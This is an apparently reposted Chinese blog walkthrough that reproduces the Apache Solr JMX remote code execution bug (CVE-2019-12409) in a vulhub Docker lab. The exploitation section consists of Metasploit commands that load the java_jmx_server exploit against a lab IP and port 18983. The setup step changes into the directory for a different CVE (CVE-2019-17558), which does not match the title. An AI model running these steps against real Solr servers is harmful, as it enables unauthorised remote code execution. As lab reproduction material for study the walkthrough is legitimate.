热门标签
热门文章
- 1yolo版本进化详解_yolov5发展历程
- 2Android TextView实现镂空效果_android 图标镂空porterduffxfermode
- 3Python基础知识③:改进案例小游戏_糖果游戏python编程
- 4vue+elementUI中Collapse的title自定义如何阻止冒泡事件_elementui collapse title自定义点击事件
- 5jar包启动脚本_jar 启动脚本
- 6MyBatis使用PageHelper实现分页查询_mybatis分页pagehelper
- 7计算机网络(计算机网络详解这一篇全了,学习速成)_计算机网络 csdn
- 8vim markmap思维导图安装_markmap-cli
- 9iradon函数和radon函数
- 10sap ui5限定table显示数据条数_sap ui table
当前位置: article > 正文
Apache Solr 远程命令执行漏洞(CVE-2019-12409)_vulfocus solr 上传代码 (cve-2019-12409)
作者:思考机器4 | 2024-02-04 13:09:55
赞
踩
vulfocus solr 上传代码 (cve-2019-12409)
前言
影响Apache Solr 8.1.1到8.2.0版本
环境搭建
启动docker
systemctl start docker
- 1
获取vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
- 1
进入对应目录
cd vulhub/solr/CVE-2019-17558/
- 1
修改配置
docker-compose.yml
version: '2'
services:
solr:
command: solr-demo
image: vulhub/solr:8.2.0
ports:
- "8983:8983"
- "18983:18983"
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
启动容器
docker-compose up -d
- 1
查看容器
docker ps
- 1
漏洞复现
进入docker容器查看配置(a0为docker ps中的容器id)
docker exec -it a0 /bin/bash
cd bin
cat solr.in.sh.orig
- 1
- 2
- 3
存在ENABLE_REMOTE_JMX_OPTS="true"
配置msf
msfconsole
use exploit/multi/misc/java_jmx_server
set rhosts 192.168.164.162
set rport 18983
run
- 1
- 2
- 3
- 4
- 5
参考文章
https://mp.weixin.qq.com/s/hCLEfDpXfDDWTTDd6vgtVA
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/58714
推荐阅读
相关标签
